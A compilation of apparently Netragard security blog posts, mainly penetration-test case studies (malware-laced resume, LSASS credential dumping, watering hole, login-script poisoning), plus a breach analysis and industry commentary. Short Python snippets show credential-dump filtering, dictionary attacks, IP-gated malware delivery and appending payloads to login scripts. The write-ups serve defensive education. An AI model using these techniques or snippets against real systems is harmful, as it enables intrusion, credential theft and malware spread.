When Netragard finished performing reconnaissance against Acme Corporation it became apparent that direct technological attacks would likely not succeed. Specifically, Acme Corporation’s externally facing systems were properly patched and properly configured. Their web applications were using a naturally secure framework, appeared to follow secure coding standards, and existed behind a web application firewall. Firing off technological attacks would do little more than alert their IT staff and we didn’t want that (their IT staff were deliberately unaware of the test).

Reconnaissance also identified a related job opportunity posted on LinkedIn for a Sr. IT Security Analyst. Interestingly the opportunity was not posted on Acme Corporation’s website. When Netragard reviewed the opportunity it contained a link that redirected Netragard to a job application portal that contained a resume builder web form. This form was problematic because it worked against our intention to submit a RADON infected resume to HR. We backtracked and began chatting on LinkedIn with the lady who posted the job opportunity. We told her that the form wasn’t loading for us but that we were interested in applying for the job. Then she asked us if we could email our resume to her directly, and of course we happily obliged.

Our resume contained a strand of RADON 2.0. RADON is Netragard’s zeroday malware generator designed specifically with customer well-being and integrity in mind. A strand is the actual malware that gets generated.   Every strand of RADON is configured with an expiration date. When the expiration date is reached the strand entirely removes itself from the infected system and it cannot be run again. RADON was created because other tools including but not limited to Metasploit’s Meterpreter are messy and leave files or even open backdoors behind. RADON is fully undetectable and uses multiple, non-disruptable covert channels for command and control. Most importantly when RADON expires it leaves systems in a clean, unaltered, pre-infection state.

Shortly after delivering our infected resume, RADON called home and had successfully infected the desktop belonging to the nice HR lady that we chatted with on LinkedIn. Our team covertly took control of her computer and began focusing on privilege escalation. RADON was running with the privileges of the HR employee that we infected. We quickly learned that those privileges were limited and would not allow our team to move laterally through the network. To elevate privileges we impersonated the HR employee that we compromised and forwarded our infected resume to an IT security manager.   The manager, trusting the source of the resume, opened the resume and was infected.

In short time, RADON running on the IT security manager’s desktop called home. It was running with the privileges of the IT security manager, who also happened to have domain administrative privileges.  Our team ran procdump on his desktop to dump the memory of the LSASS process.  This is important because the LSASS process contains copies of credentials that can be extracted from a dump.  The procdump command is “safe” because it is a standard Microsoft program and does not trigger security alerts.   However, the process of extracting passwords from the dump often does trigger alerts.  To avoid this we transferred the dump to our test lab, where we could safely run mimikatz to extract the credentials.

Then we used the credentials to access all three of Acme Corporation’s domains and extracted their respective password databases. We exfiltrated those databases back to our lab and successfully cracked 93% of all the current and historical passwords for all employees at Acme Corporation. The total elapsed time between initial point of entry and password database exfiltration was 28 minutes. At this point we’d reached an irrevocable foothold in Acme Corporation’s network. With that accomplished it was time to go after our main target, the CDE.

The process of identifying the CDE required aggressive reconnaissance. Our team searched key employee desktops for any information that might contain credentials, keys, VPN information, etc.   Our first search returned thousands of files spanning more than a decade. We then ordered the files by modification date and content and quickly found what we were looking for. The CDE could only be accessed by two users via VPN from within Acme Corporation. Making things more complex, the VPN was configured with two-factor authentication that was not tied into the domain.

Fortunately for us, this is not the first time we’ve run into this type of configuration. Our first step towards breaching the CDE was to breach the desktop of the CDE maintenance engineer. This engineer’s job was to maintain the systems contained within the CDE from both a functionality and security perspective. To do this we placed a copy of RADON on his desktop and executed it as a domain administrator using RPC. The new RADON instance running on the CDE maintenance engineer’s desktop called home and we took control.

We quickly noticed that various VPN processes were already running on the CDE maintenance engineer’s desktop. So we checked the routing table for IP addresses that we knew to be CDE related (from the files that we gathered earlier) and sure enough they existed. This confirmed that there was an active VPN session from our newly compromised desktop into the CDE. Now all we had to do was hijack this session, breach the CDE, and take what we came for.

We used the net shell command (netsh) to create a port forward rule from the infected desktop to the CDE. We then used a standard Windows RDP client to connect to the CDE server, but when we tried to authenticate, it failed. Rather than risking detection, we decided to take a step back and explore the CDE maintenance engineer’s desktop to see if we could find credentials related to the CDE.   Sure enough, we found an xls document in a folder named “Encrypted” (which it wasn’t) that contained the credentials we were looking for. Those credentials allowed us to log into the CDE without issue.

When we breached the CDE we noticed that our user was a domain administrator for that environment. As a result, not only did we have full control over the CDE, but our activity would appear to be normal maintenance rather than hacker related. In short time we were able to locate customer credit card data, which was properly encrypted. Despite this, we were confident that we’d be able to decrypt it by leveraging discoveries from our previous reconnaissance efforts (we did not make that effort, at the customer’s request).

When we began exploring avenues for data exfiltration we found that the CDE had no outbound network controls. As a result, if we were bad actors we could have sent the credit card data to any arbitrary location on the Internet.

In summary, there were three points of failure that enabled our team to breach the CDE. The first point of failure is unfortunately common; network administrators tend to work from accounts that have domain administrative privileges. What network administrators should do instead is to use privileged accounts only when needed. This issue is something that we encounter in nearly every test that we do and it almost always allows us to achieve network dominance.

The second point of failure was the VPN that created a temporary bridge from the LAN to the CDE. That VPN was configured with split tunneling. It should have been configured in such a way that when the computer was connected to the CDE it was disconnected / unreachable from the corporate network. That configuration would have prevented our team from breaching the CDE with the described methodology.

The third point of failure was that the CDE did not contain any outbound network controls.   We were able to establish outbound connections on any port to any IP address of our choosing on the Internet. This means that we were in a position to extract all of Acme Corporation’s credit card data without detection and without issue. Clearly, the correct configuration would be one that is highly restrictive and that alarms on unexpected outbound connections.

Finally, the differences between compliance and security are vast. In the past decade we’ve seen countless businesses suffer damaging compromises at the hands of malicious hackers. These hackers get in because they test with more talent, more tenacity, and more aggression than nearly all of the penetration testing vendors operating today. For this reason we can’t stress how important it is that businesses select the right vendor and test at realistic threat levels. It is impossible to build effective defenses without first understanding how a real threat will align with your unique risks. At Netragard, we protect you from people like us.

Ukrainian hacker admits stealing business press releases for $30M: what they’re NOT telling you

The sensationalized stories about the hacking of PR Newswire Association, LLC., Business Wire, and Marketwired, L.P. (the Newswires) are interesting but not entirely complete.  The articles that we’ve read so far paint the Newswires as victims of some high-talent criminal hacking group.  This might be true if the Newswires actually maintained a strong security posture, but they didn’t.  Instead their security posture was insufficiently robust to protect the confidentiality, integrity or availability of the data contained within their networks.  We know this because enough telling details about the breach were made public (see the referenced document at the end of this article).
In this article we first provide a critical analysis of the breaches based on public information, primarily from the published record.   We do make assumptions, based on the information provided and our own experience with network penetration, to fill in some of the gaps. We call out the issues that we believe allowed the hackers to achieve compromise and cause damage to the Newswires.   Later we provide solutions that could have been used (and can be used by others) to prevent this type of breach from happening again. If we miss something, or if we can add to the solutions that we provide, please feel free to comment and we will update this article accordingly.
From the published record we know that Marketwired was hacked via the exploitation of SQL Injection vulnerabilities.  We know that the hacking was ongoing for a three-year period.  Additionally, according to the records the SQL Injection attacks happened on at least 390 different occasions over a three-month span (between April 24th 2012 and July 20th, 2012).  We assume that Marketwired was unaware of this activity because no responsive measures were taken until years after the initial breach and well after damage was apparently realized.
With regards to SQL Injection, an attacker usually needs to build the attack through a process of trial and error, which generates an abundance of suspicious error logs.  In the rare cases when an attacker doesn’t need to build the attack, the actual attack will still generate a wealth of suspicious log events.  Moreover, SQL Injection made its debut 17 years ago, in a 1998 release of Phrack magazine, a popular hacking zine.   Today SQL Injection is a well-known issue and relatively easy to mitigate, detect, and/or defeat.  In fact, almost all modern firewalls and security appliances have SQL Injection detection/prevention built in. Considering the normally overt nature of SQL Injection, the extended timeframe of the activity, and the apparent lack of detection, it strongly suggests that Marketwired’s security was (and may still be) exceptionally deficient.
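For readers unfamiliar with the mechanics, SQL Injection works because attacker-controlled input is concatenated directly into a query string; a parameterized query treats the same input as an inert literal value. A minimal illustration using SQLite (table and data are invented):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

payload = "nobody' OR '1'='1"  # classic injection string

# Vulnerable: attacker input concatenated into the query text
rows = conn.execute(
    "SELECT secret FROM users WHERE name = '" + payload + "'"
).fetchall()
print(rows)  # leaks every row: [('s3cret',)]

# Safe: the parameterized query treats the payload as a plain value
rows = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (payload,)
).fetchall()
print(rows)  # [] -- no user is literally named "nobody' OR '1'='1"
```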
It is Netragard’s experience from delivering Platinum level (realistic threat) Penetration Tests that businesses have a 30-minute to 1-hour window in which to detect and respond to an initial breach. When Netragard’s team breaches a customer network, if the customer fails to detect and revoke Netragard’s access within that timeframe then the customer will likely not be able to forcefully expel Netragard from its network. Within a 30-minute window of initial penetration, Netragard is 89% likely to compromise its customer’s domain controller(s) and achieve total network dominance. Within a 1-hour window of initial penetration, Netragard is 98% likely to do the same.
We know that Marketwired’s failure to detect the initial breach (and subsequent attacks) provided the hackers with ample time to metastasize their penetration throughout the network. The published record states that the hackers “installed multiple reverse shells”. The record also states “in or about March 2012, the Hackers launched an intrusion into the networks of Marketwired whereby they obtained contact and log-in credential information for Marketwired’s employees, clients, and business partners.” We assume that the compromise of “log-in credential information” means that the hackers successfully compromised Marketwired’s domain controllers and exfiltrated / cracked their database of employee usernames and passwords. Given the fact that people tend to use the same passwords in multiple places (discussed later as well), the potential impact of this is almost immeasurable.
While considerably less information about the breach of PRN’s network is available, the information that is public indicates that significant security deficiencies existed. According to the published record, PRN detected the intrusions into its network well after the network was breached, which represents a failure of effective incident detection. Moreover, it appears that PRN’s response was largely ineffective: PRN ejected the hackers from the network, but the hackers regained access. According to the record, this dance of ejection and re-breach happened at least three times.
The third breach into PRN is very telling. This time the hackers purchased a list of logins taken from a compromised social networking website. The hackers then “reviewed and collected usernames and logins for PRN employees” from that list and used the collected information “to access the Virtual Private Network (“VPN”) of PRN”. Clearly PRN did not use two-factor authentication for its VPN, which would have prevented this method of penetration. It is also important to note that two-factor authentication is necessary to satisfy some regulatory requirements. Additionally, PRN’s policy around password usage and password security was either seriously deficient or not being adhered to. Specifically, PRN employees were using the same passwords on social media websites (and possibly other places) as they were on PRN’s network.   As with Marketwired’s breach, PRN’s breaches were very likely preventable.
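The attackers’ use of the purchased list boils down to filtering a breached credential dump for addresses at the target company, then replaying those passwords against the VPN. A simplified sketch of the filtering step (the dump rows and domain are invented):

```python
def harvest_targets(breached_creds, company_domain):
    """Filter a breached credential dump down to a target company's users."""
    suffix = "@" + company_domain.lower()
    return [(email, password) for email, password in breached_creds
            if email.lower().endswith(suffix)]

dump = [("alice@prn-example.com", "Winter2012!"),  # invented sample rows
        ("bob@gmail.com", "hunter2")]
print(harvest_targets(dump, "prn-example.com"))
# [('alice@prn-example.com', 'Winter2012!')]
```

Two-factor authentication defeats this entire approach because a reused password alone no longer grants access.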
Even less information is available about Business Wire’s breach. According to the records Business Wire’s network was initially breached via SQL Injection (like Marketwired) by another hacker at an earlier time. Iermolovych (the name of the hacker who hacked the Newswires) purchased access to Business Wire’s network from the other hacker. As with Marketwired and PRN, Business Wire’s own detection and response capabilities were (and may still be) lacking. It is unclear from the record as to how long the hackers were able to operate within Business Wire’s network but it is clear that the initial SQL Injection attack and subsequent breach was not detected or responded to in a timely manner.
Unfortunately, based on our own experience, most businesses are as vulnerable as the Newswires. The reasons for this are multifaceted and we may cover them in another article at a later time. For now, we’ll focus on what could have been done to prevent the damages that resulted from this breach. It’s important to stress that every network will be breached at some point during its lifetime. The question is whether the Incident Response will be effective at detecting the breach and preventing it from becoming damaging.
To understand the solution we must first understand the problem. Damaging breaches have two common characteristics: poor network security and ineffective Incident Response. We know from studying historical breach data from the Verizon DBIR and OWASP that approximately 99.8% of all breaches are the product of the exploitation of known vulnerabilities for which CVEs have already been published (many for over one year). This validates our first characteristic. The second characteristic is validated by the ever-increasing number of damaging breaches that are reported each year. The fact that these breaches are damaging shows that Incident Response has failed.
Most of the reported breaches in the past decade could have been avoided by proactively countering the two aforementioned points of failure. Countering these failure points requires actionable intelligence about how a threat will align with the unique risks of each associated network and how sensitive data will be accessed. The best method of assembling this intelligence is to become the victim of a breach not through malicious hacking but instead through high-quality, realistic-threat penetration testing.   Unfortunately this isn’t as easy as it sounds. The industry standard penetration test is a vetted vulnerability scan which is far from realistic and provides no real protective benefit. There are a few realistic threat penetration-testing vendors in operation but finding them can be a challenge.
Some of the characteristics of a realistic threat penetration test include but are not limited to social engineering with solid pretexts, undetectable malware, the non-automated identification and exploitation of network and web application vulnerabilities, exploit customizations, and stealth penetration. A realistic penetration testing team will never request that its IP addresses be whitelisted nor will they request credentials (unless perhaps for web application testing). The team will similarly not be dependent on (and may elect not to even use) automated tools like Nessus, Nexpose, The Metasploit Framework, etc. Automated tools are useful for basic security & maintenance purposes but not for the production of realistic threats. Do you think the hackers that hacked Target, Sony, Hannaford, LinkedIn, The Home Depot, Ashley Madison, or The Newswires used those scanners?
The report generated by a realistic penetration test should cover the full spectrum of vulnerabilities as well as the Path to Compromise (PTC). The PTC represents the path(s) that an attacker must follow to compromise sensitive data from a defined source (Internet, LAN, etc.). Identifying the PTC is arguably more important from a defensive perspective than vulnerability identification. This is because it is technically impossible to identify every vulnerability that exists in a network (or in software), and so there will always exist some level of gap. Identifying the PTC allows a business to mitigate this gap by creating an effective IR plan capable of detecting and responding to a breach before it becomes damaging. Netragard’s platinum level Network Penetration Testing services produce a high-detail PTC for exactly this reason.
The Newswires (and many other businesses) could likely have prevented their breach if they had done the following.

  1. Deployed a response-capable Web Application Firewall and configured the firewall specifically for the application(s) that it was protecting. This would have prevented the SQL Injection attacks from being successful.
  2. Deployed a Network Intrusion Detection / Prevention solution to monitor network traffic bidirectionally. This would likely have enabled them to detect the reverse-shells.
  3. Deployed a Data Loss Prevention solution. This would likely have prevented some if not all of the releases from being exfiltrated.
  4. Deployed a SIEM capable of receiving, correlating and analyzing feeds from system logs, security appliances, firewalls, etc. This would likely have allowed the Newswires to detect and respond to the initial attacks before breach and well before damage.
  5. Purchased realistic-threat penetration testing that produced a report containing a detailed PTC and then implemented the suggested methods for mitigation, remediation, and hardening provided in the report. The test would enable them to measure the effectiveness of their existing security solutions and to close any gaps that might exist.
  6. Deployed an internal honeypot solution (like Netragard’s) that would have detected lateral movement (Distributed Metastasis) inside of their networks and allowed the Newswires to respond prior to experiencing any damage.

Records for reference

Enemy of the state

A case study in Penetration Testing
We haven’t been blogging as much as usual largely because we’ve been busy hacking things.   So, we figured that we’d make it up to our readers by posting an article about one of our recent engagements. This is a story about how we covertly breached a highly sensitive network during the delivery of a Platinum level Penetration Test.

First, we should make clear that while this story is technically accurate, certain aspects have been altered to protect our customer’s identity and security. In this case we can’t even tell you if this was for a private or public sector customer. At no point will we ever write an article that would put any of our customers at risk. For the sake of intrigue, let’s call this customer Group X.

The engagement was designed to produce a level of threat that would exceed what Group X was likely to face in reality. In this case Group X was worried about specific foreign countries breaching their networks. Their concern was not based on any particular threat, but instead on trends and what we agreed was reasonable threat intelligence.   They were concerned with issues such as watering holes, spear phishing, 0-day malware, etc. They had reason for concern given that their data was, and still is, critically sensitive.

We began work like any experienced hacker would, by performing social reconnaissance. Social reconnaissance should always be used before technical reconnaissance because it’s passive by design. Social reconnaissance when done right will provide solid intelligence that can be used to help facilitate a breach. In many cases social reconnaissance can eliminate the need for active technical reconnaissance.

Just for the sake of explanation, technical reconnaissance includes active tasks like port scanning, web server scanning, DNS enumeration, etc. Technical reconnaissance is easier to detect because of its active methods. Social reconnaissance, when done right, is almost impossible to detect because it is almost entirely passive. It leverages tools like Google, Maltego, Censys, etc. to gather actionable intelligence about a target prior to attack.

Our social reconnaissance efforts identified Group X’s entire network range, a misconfigured public facing document repository (that did not belong to Group X but was used by them and their partners/vendors), and a series of news articles that were ironically focused on how secure Group X was. One of the articles went so far as to call Group X the “poster child of good security”.

We began by exploring the contents of the aforementioned document repository. The repository appeared to be a central dumping ground for materials Group X wanted to share with third parties, including vendors. While digging through the information, all of it appeared to be non-sensitive and mostly intended for public consumption. As we dug further we uncovered a folder called WebServerSupport, and contained within that folder was a file called “encrypted.zip”. Needless to say we downloaded the file.

We were able to use a dictionary attack to guess the password for the zip file and extract its contents. The extracted files included a series of web server administration guides complete with usernames, passwords, and URL’s. One of the username, password and URL combinations was for Group X’s main website (https://www.xyxyxyxyxy.com/wp-admin,username,password). When we browsed to https://www.xyxyxyxyxy.com/wp-admin we were able to login using the credentials. With this level of access we knew that it was time to poison the watering hole. (https://en.wikipedia.org/wiki/Watering_Hole)
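A dictionary attack is just a loop over a wordlist. For a real zip archive the extraction attempt would be zipfile’s read call with a pwd argument wrapped in try/except; injecting the attempt function keeps this sketch generic and testable without a real encrypted archive. The winning password below is, of course, invented:

```python
def dictionary_attack(try_password, wordlist):
    """Return the first password that unlocks the target, else None."""
    for candidate in wordlist:
        if try_password(candidate):
            return candidate
    return None

# Stand-in "archive" that opens only with one specific password
unlocks = lambda pw: pw == "webserver1"
print(dictionary_attack(unlocks, ["123456", "password", "webserver1"]))
# webserver1
```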

To accomplish this we deployed our malware framework into the webserver (www.xyxyxyxyxy.com). Our framework is specifically designed to allow us to control who is infected. We are able to select targets based on their source IP address and other identifying information. When a desired target connects to the watering hole (infected website), our framework deploys our 0-day pseudo-malware (RADON) onto the victim’s computer system.   RADON then establishes persistence and connects back to our command and control server. From there we are able to take complete control of the newly infected computer.
Netragard RADON v2.0 Strand Generator
RADON is not the same RADON used by the National Security Agency (NSA), as was speculated by the InfoSec Institute, though it does appear similar in some respects. It relies on side-channel communications that cannot be disrupted without breaking core network protocols. It was designed to be far safer than other tools that tend to leave files behind (like Metasploit’s Meterpreter). All strands of RADON are built with an expiration date that, when reached, triggers a clean uninstall and renders the original strand inert. We designed RADON specifically because we needed a safe, clean, and reliable method to test our customers at high levels of threat.
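The framework’s actual selection logic is proprietary, but the source-IP gating described above can be sketched in principle. In this illustration the network range, the `serve` helper, and the `/payload.js` hook are all made-up placeholders, not details from the real engagement:

```python
import ipaddress

# Hypothetical target ranges; real selection also used other identifying information.
TARGET_NETWORKS = [
    ipaddress.ip_network("203.0.113.0/24"),  # placeholder for Group X's range
]

def is_target(client_ip):
    """Return True if the connecting IP falls inside a targeted network."""
    addr = ipaddress.ip_address(client_ip)
    return any(addr in net for net in TARGET_NETWORKS)

def serve(client_ip, page_html):
    """Serve the clean page to bystanders; arm the page only for targets."""
    if is_target(client_ip):
        return page_html + '<script src="/payload.js"></script>'  # hypothetical hook
    return page_html
```

Gating infection this way is what keeps a watering hole stealthy: random visitors see the legitimate site, so the compromise generates no noise outside the intended victim pool.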

After the malware framework was deployed and tested, we scheduled it to activate the next business day. The framework was designed to infect one target then sleep until we instructed it to infect the next. This controlled infection methodology helps to maintain stealth. By 9:30 AM EST our first RADON strand called home. When we reviewed the connection we learned that we had successfully infected a desktop belonging to Group X’s CIO’s assistant. We confirmed control and were ready to begin taking the domain (which, as it turns out, was ridiculously easy).

One of the first things we do after infecting a host is to explore network shares. During this test we quickly located the “scripts” share, which contained all of the login scripts for domain users. What we didn’t expect was that we’d be able to read, write, and otherwise modify every single one of those startup scripts. We were also able to create new scripts, files, and directories within the scripts share. So we uploaded RADON to the share and added a line to every login script that would run RADON each time a user logged into a computer. We quickly infected everything on the network.
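The login-script poisoning step above is mechanically trivial once the share is writable. A hedged sketch, assuming the share is mounted locally and the payload line is a one-line launcher (both the share path and payload command below are placeholders):

```python
import os

def poison_login_scripts(share_dir, payload_line):
    """Append a payload-launch line to every .bat/.cmd login script in a writable share.

    Returns the list of scripts that were modified.
    """
    modified = []
    for name in sorted(os.listdir(share_dir)):
        if name.lower().endswith((".bat", ".cmd")):
            path = os.path.join(share_dir, name)
            with open(path, "a") as script:
                # CRLF line endings, since these scripts run under cmd.exe
                script.write("\r\n" + payload_line + "\r\n")
            modified.append(name)
    return modified
```

Because every domain user runs their login script at logon, one writable share translates directly into code execution on every workstation — which is exactly why write ACLs on SYSVOL-style script shares matter so much.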

After parsing through the onslaught of new inbound RADON connections we were able to identify personal user accounts belonging to network administrators. As it turned out, most of the administrators’ personal accounts also had domain admin privileges. We leveraged those accounts to download the username and password database (ntds.dit) from the domain controller. Then we used RADON to exfiltrate the password database and dump it on one of our GPU password-cracking machines. We were able to crack all of the current and historical passwords in less than two hours. What really surprised us was that 90% of the passwords were identical.

Initially we thought that this was due to an error. But after further investigation we realized that this common password could be used to log in with all of the different domain accounts. It became even more interesting when we began to explore the last password change dates. We found that nearly 100% of the passwords had never been changed and that some of the accounts were over a decade old, still active, but no longer used by anyone. We later found out that employees who had been terminated never had their accounts deactivated. When we confronted the customer with this, they told us it was their policy not to change passwords. When we asked why, they pointed to an article written by Bruce Schneier. (Sorry Bruce, but this isn’t the first time you’ve made us question you.)
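Spotting this kind of password reuse doesn’t even require cracking: identical passwords produce identical NT hashes, so a frequency count over the dumped hashes is enough. A minimal sketch (the function name is ours):

```python
from collections import Counter

def shared_password_ratio(nt_hashes):
    """Fraction of accounts whose NT hash equals the single most common hash.

    NT hashes are unsalted, so equal hashes imply equal passwords.
    """
    counts = Counter(h.lower() for h in nt_hashes)
    _, top_count = counts.most_common(1)[0]
    return top_count / len(nt_hashes)
```

Running this over an ntds.dit dump before any cracking starts is a cheap way for defenders to audit their own reuse exposure.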

At this point in the engagement we had more control over our customer’s infrastructure than they did. We were able to control all of their critical devices including but not limited to antivirus solutions, firewalls, intrusion detection and prevention systems, log correlation systems, switches, routers and, of course, their domain. We accomplished this without triggering a single event and without arousing any suspicion.

The last two tasks that remained were trophy gathering and vulnerability scanning. Trophy gathering was easy given the level of access that we had. We simply searched the network for .pdf, .doc, .docx, .xlsx, etc. and harvested files that looked interesting. We also found about a dozen reports from other penetration testing vendors. Those reports presented Group X’s network as well managed and well protected; the only vulnerabilities identified were low- and medium-severity issues, none of which were exploitable.
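The trophy sweep above amounts to a recursive extension search across accessible shares. A sketch of the idea, assuming the shares are mounted as local paths (the extension set is what the post names, plus nothing else):

```python
import os

INTERESTING = {".pdf", ".doc", ".docx", ".xlsx"}

def harvest_documents(root):
    """Walk a mounted share and collect paths whose extension looks like a document."""
    trophies = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in INTERESTING:
                trophies.append(os.path.join(dirpath, name))
    return sorted(trophies)
```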

When we completed our final task, vulnerability scanning and vetting, our scanners produced results that were nearly identical to the other penetration testing vendor reports we had exfiltrated. Things like deprecated SSL, open ports, etc. were reported, but nothing that could realistically lead to a network compromise. When we scanned Group X’s network from the perspective of an Internet-based threat, no vulnerabilities were reported. Our scans left their security team excited and proud because they had “caught” and “prevented” our intrusion attempt. When we told them to check their domain for a Netragard domain admin account, their excitement was over.

Exploit Acquisition Program Shut Down

We’ve decided to terminate our Exploit Acquisition Program (again). Our motivation for terminating it revolves around ethics, politics, and our primary business focus. The HackingTeam breach proved that we could not sufficiently vet the ethics and intentions of new buyers. HackingTeam, unbeknownst to us until after their breach, was clearly selling its technology to questionable parties, including but not limited to parties known for human rights violations. While it is not a vendor’s responsibility to control what a buyer does with an acquired product, HackingTeam’s exposed customer list is unacceptable to us. The ethics of that are appalling, and we want nothing to do with it.

While EAP was an interesting and viable source of information for Netragard, it was never Netragard’s primary business focus. Netragard’s primary focus has always been the delivery of genuine, realistic-threat penetration testing services. While most penetration testing firms deliver vetted vulnerability scans, we deliver genuine tests that replicate real-world malicious actors. These tests are designed to identify vulnerabilities as well as paths to compromise, and to help our customers build solid protective plans.

It is important to mention that we are still strongly in favor of ethical 0-day development, brokering, and sales. The need for 0-days is very real, and their uses are often both ethical and for the greater good. One of the best-known examples was when the FBI used a Firefox 0-day to target and eventually dismantle a child pornography ring. People who argue that all 0-days are bad are either uneducated about 0-days or have questionable ethics themselves. 0-days are nothing more than useful tools that, when placed in the right hands, can benefit the greater good.

If and when the 0-day market is correctly regulated we will likely revive EAP. The market needs a framework (unlike Wassenaar) that holds the end buyers accountable for their use of the technology (similar to how guns are regulated in the US). It’s important that the regulations do not target 0-days specifically but instead target those who acquire and use them. It is also important to remember that hackers don’t create 0-days; software vendors create them during the software development process. 0-day vulnerabilities exist in all major pieces of software, and if the good guys aren’t allowed to find them then the bad guys will.

What real hackers know about the penetration testing industry that you don’t.

The information security industry has become politicized and almost entirely ineffective, as evidenced by the continually increasing number of compromises. The vast majority of security vendors don’t sell security; they sell political solutions designed to satisfy the political security needs of third parties. Those third parties often include regulatory bodies, financial partners, government agencies, etc. People are more concerned with satisfying the political aspects of security than with actually protecting themselves, their assets, or their customers from risk and harm.

For example, the Payment Card Industry Data Security Standard (PCI-DSS) came into existence on December 15th, 2004. The standard defined a set of requirements that businesses needed to satisfy in order to be compliant. One of those requirements is that merchants must undergo regular penetration testing. While that requirement sounds good, it completely fails to define any realistic measure against which tests should be performed. As a result, the requirement is easily satisfied by the most basic vetted vulnerability scan so long as the vendor calls it a penetration test (the same is still largely true for PCI 3.0).

To put this into perspective, the V0 and V50 ballistics testing standards establish clear requirements for the performance of armor. These requirements take into consideration the velocity of a projectile, the size of a projectile, the number of strikes, etc. If penetration is achieved when testing against the standards, then the armor fails and is not deployable. If PCI-DSS were used in place of the V0 and V50 standards, it would suffice to test a bulletproof vest with a squirt gun. In such a case the vest would be considered ready for deployment despite its likely failure in a real-world scenario.

This is in part what happened to Target and countless others. Target’s former CEO, Gregg Steinhafel, was quoted as saying “Target was certified as meeting the standard for the payment card industry (PCI) in September 2013. Nonetheless, we suffered a data breach.” What does that tell us about the protective effectiveness of PCI? What good is a security regulation if it fails to provide the benefit it was designed to deliver? More importantly, what does that say about the penetration testing industry as a whole?

While regulations are ineffective, it is the customer’s choice to be politically oriented or security focused. In 2014, 80% of Netragard’s customers opted to receive political security testing services (a check in the box) rather than genuine security testing services, even after having been educated about the difference. Most businesses consider the political benefit of receiving a check in the box a higher priority than good security (this is also true of the public sector).

This political agenda motivates decision makers to select penetration testing vendors (or other security solutions) based on cost rather than quality. Instead of asking intelligent questions about the technical capabilities of a penetration testing team, they ask technically irrelevant questions about finances, the types of industries a vendor may have serviced, whether the vendor is in Gartner’s Magic Quadrant, etc. While those questions might provide a vague measure (at best) of vendor health, they completely fail to provide any insight into real technical capability. The irony is that genuine penetration testing services carry both lower average upfront costs and lower average long-term costs than political penetration testing services.

The lower average upfront cost of genuine penetration testing comes from the diagnostic pricing methodology (called Attack Surface Pricing, or ASMap pricing) that genuine penetration testing vendors depend on. ASMap pricing measures the exact workload requirement by diagnosing every in-scope IP address and web application (“Target”) during the quote generation process. Because each Target offers different services, each one also requires a different amount of time for real manual testing. ASMap pricing never results in an overcharge or undercharge and is a requirement for genuine manual penetration testing. In fact, diagnostic pricing is the de facto standard for all service-based industries, with the exception of political penetration testing (more on that later).

The lower long-term costs associated with genuine penetration testing stem from the protective nature of genuine penetration testing services. If the cost in damages of a single successful compromise far exceeds the cost of good security, then clearly good security is more cost effective. Compare the average cost in damages of any major compromise to the cost of good security. Good security costs less, period.

Political penetration testing (the industry norm) uses a Count Based Pricing (“CBP”) methodology that almost always results in an overcharge. CBP takes the number of IP addresses that a customer reports to have and multiplies it by a cost per IP. CBP does not diagnose the targets in scope and is a blind pricing methodology. What happens if a customer tells a vendor that they have 100 IP addresses that need testing but only 1 IP address offers any connectable services? If CBP is being used then the customer will be charged for testing all 100 IP addresses when they should only be charged for 1. Is that ethical pricing?
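The arithmetic behind the two pricing models is simple enough to state directly. A sketch using hypothetical rates (neither the per-IP rate nor the hourly rate below comes from the post):

```python
def cbp_price(reported_ip_count, rate_per_ip):
    """Count Based Pricing: blind multiplication over the reported IP count."""
    return reported_ip_count * rate_per_ip

def asmap_price(hours_per_live_target, hourly_rate):
    """Attack-surface pricing: bill only diagnosed, testable targets.

    hours_per_live_target holds one workload estimate per target that
    actually exposes connectable services.
    """
    return sum(hours_per_live_target) * hourly_rate
```

With the 100-IP scenario above and made-up rates of $400 per IP versus $250 per hour, CBP bills $40,000 for 100 reported addresses, while ASMap bills $2,500 if the single live host needs 10 hours of manual work — the gap exists because only one methodology looks at the network before quoting.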

A good example of CBP overcharge happened to one of our customers last year. This customer approached both Netragard and another well-known Boston-based firm. The other firm produced a proposal using CBP based on the customer having 64 IP addresses; we produced a proposal using the ASMap methodology. Our proposal came in over $55,000.00 less than the other vendor’s. When the customer asked us how that was possible, we explained that of their 64 IP addresses only 11 were live, and of those 11, only 2 presented any real testable surface. Needless to say, the other vendor didn’t win the engagement.

CBP cannot be used to price a manual penetration testing engagement because it also runs the risk of undercharging. Any engagement priced with the CBP methodology is dependent on vulnerability scanning, because CBP is a blind pricing methodology that does not diagnose workload. If a customer is quoted $5,000 to test 10 IP addresses, CBP simply assumes a fixed workload for those 10 IP addresses regardless of what each one actually exposes.

What happens if each IP address requires 10 hours of manual labor? Engagements priced with CBP rely on automated scanners to compensate for these potential overages and to ensure that the vendor always makes a profit. Unfortunately, this dependence on automated scanning degrades the quality of the engagement significantly. The political penetration testing industry falsely promises manual services when in fact the final deliverable is more often than not a vetted vulnerability scan. This promotes a false sense of security that all too often leads to compromise.

Customers can choose to be lazy and make naïve, politically oriented security decisions, or they can self-educate, choose good security, and save themselves considerable time and money. While the political security path appears simple and easy at the onset, the unforeseen complexities and potential damages that lie ahead are all too often catastrophic. How much money is your business worth, and what are you doing to truly protect it?

We’re offering a challenge to anyone willing to accept. If you think your network is secure, then let us test it with our unrestricted methodology. If we don’t compromise your network, the test is free of charge; if we do, you pay cost plus 15%. During the test we expect you to respond the same way you would to a real threat. We don’t expect to be whitelisted and we don’t expect you to lower your defenses. Before you accept this challenge, let it be known that we’ve never failed. To date our unrestricted methodology maintains a 100% success rate with an average time to compromise of less than 4 hours. Chances are you won’t know we’re in until it’s too late.

Do you accept?